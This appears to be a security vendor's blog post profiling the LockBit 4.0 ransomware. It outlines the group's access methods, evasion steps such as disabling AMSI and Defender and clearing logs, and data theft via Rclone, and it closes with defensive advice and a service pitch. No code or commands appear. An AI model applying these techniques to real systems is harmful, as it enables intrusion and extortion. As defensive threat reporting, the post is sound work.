Key takeaways:
- LockBit 4.0 is the latest iteration of a notorious ransomware-as-a-service (RaaS) family that has been active since 2019.Â
- It poses a significant threat due to its enhanced stealth, adaptability, and sophisticated attack mechanisms.
- The July 2025 variant further includes fully polymorphic code.
The notorious LockBit ransomware group is back and more dangerous than ever. Following a brief disruption by the international law enforcement “Operation Cronos” in early 2024, the group has resurfaced with LockBit 4.0. Released around February 2025, it’s a significant evolution designed for maximum stealth, damage, and resilience. This new version incorporates advanced evasion techniques that make detection incredibly difficult.
LockBit 4.0 ransomware overview
LockBit has long dominated the ransomware landscape, operating on a highly effective Ransomware-as-a-Service (RaaS) model. It functions like a dark-web tech startup, providing its malware and infrastructure to “affiliates” who carry out attacks.Â
The ransomware is cross-platform, with custom builders capable of targeting Windows, Linux, and VMware ESXi environments, making it a threat to virtually any corporate network.
Learn how to ensure network security with our complete guide.
Common methods LockBit 4.0 uses to gain initial access within a network
LockBit 4.0, like its predecessors, employs a variety of common cyberattack methods to gain initial access to an organization’s systems and then propagate internally. These methods often exploit human vulnerabilities or technical weaknesses.
Phishing emails
Social engineering through phishing is a primary method. Attackers send malicious emails containing links or attachments that, when clicked or opened, execute the ransomware payload or a modified PowerShell script that initiates the attack chain.
Exploiting system vulnerabilities
LockBit often takes advantage of unpatched vulnerabilities in widely used software, applications, or internet-exposed services. This could include vulnerabilities in operating systems, enterprise applications, or network infrastructure.
Since most attacks happen due to this vulnerability, it’s critical that system patching becomes a basic step in every cybersecurity plan.
Remote Desktop Protocol (RDP)
Attackers can brute-force RDP credentials or exploit vulnerabilities in RDP services to gain remote access.
Lateral movement, privilege escalation, and defense evasion techniques
Once initial access is gained, LockBit 4.0 utilizes several techniques to move laterally, elevate privileges, and evade detection:
Living Off The Land Binaries (LoLBins)
The ransomware heavily relies on legitimate system tools and binaries native to the operating system (e.g., PowerShell, SMB, net.exe, taskkill.exe, wmic.exe). This makes its activities appear “normal” and harder to detect, as it avoids introducing new, easily identifiable malicious files.
PowerShell abuse
A modified PowerShell script is often the initial executor, deploying a malicious DLL payload. It also abuses PowerShell for downloading and executing files.
Privilege escalation
LockBit uses tools like Mimikatz to attain escalated privileges, and also leverages user additions to security groupings and UAC (User Account Control) bypass techniques.
Disabling security features
LockBit 4.0 is designed to disable security features like AMSI (Antimalware Scan Interface) in PowerShell and can manipulate registry keys to disable Microsoft Defender Antivirus. It also performs Wevutil cleanup to clear logs for defense evasion.
Data exfiltration
Before encryption, LockBit exfiltrates sensitive information, often using tools like Rclone or MegaCMD, command-line utilities for managing files across a wide range of cloud storage services and local storage, for its double extortion scheme.
LockBit 4.0 evolution
The July 2025-variant introduces fully polymorphic code, meaning the malware’s signature changes with every deployment, rendering traditional signature-based antivirus solutions obsolete. It also features sandbox detection, allowing it to identify virtual analysis environments and halt execution to prevent security researchers from studying it.
"LockBit 4.0’s ability to bypass EDRs, disable telemetry like ETWTI, and employ advanced obfuscation methods isn’t just an evolution - it’s a clear reminder that traditional defenses aren’t enough. Today, every incident has to be treated as an assumed breach, and response speed is critical to limiting impact."
After execution, the ransomware deletes itself from the disk to frustrate forensic analysis and cover its tracks.
LockBit 4.0’s evolution provides clear, non-negotiable takeaways for modern defense:
- Defense must be behavioral. Organizations need Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) solutions that can identify malicious actions (like AMSI bypasses or DLL unhooking), not just files.
- You must shift from passive defense to proactive threat hunting. Security teams should be actively monitoring for behavioral indicators, such as the use of tools like Rclone or MegaCMD, large outbound data streams, and suspicious PowerShell activity.
- Your backups must be protected. The 3-2-1 backup rule is no longer enough. The “1” (offline copy) must be truly offline or immutable. Network-attached backups are simply another target.
Mitigation and incident response
Given LockBit 4.0’s advanced stealth, the focus must shift from simple prevention to robust, multi-layered defense and, most importantly, rapid, expert-led response. Here are the three basic rules to respond to a Lockbit cyber attack:
- Contain and do not reboot
Immediately isolate the affected systems. Unplug them from the network (both Ethernet and Wi-Fi) to stop the ransomware from spreading. Do not reboot or shut down, as this can destroy forensic evidence in memory.
- Do not payÂ
Law enforcement, the FBI, and cybersecurity experts strongly advise against paying the ransom. It does not guarantee you’ll get your data back, and it funds future criminal activity.
- Call for help
A sophisticated attack like LockBit 4.0 is not a DIY fix. You need a professional response to contain the breach, assess the damage, and eradicate the threat. If your organization has been compromised, contact Proven Data’s DFIR Incident Response team immediately for 24/7 emergency assistance.
If your data or your backups have been encrypted, our specialists may still be able to help. Proven Data’s ransomware recovery services have successfully recovered data from hundreds of catastrophic attacks.
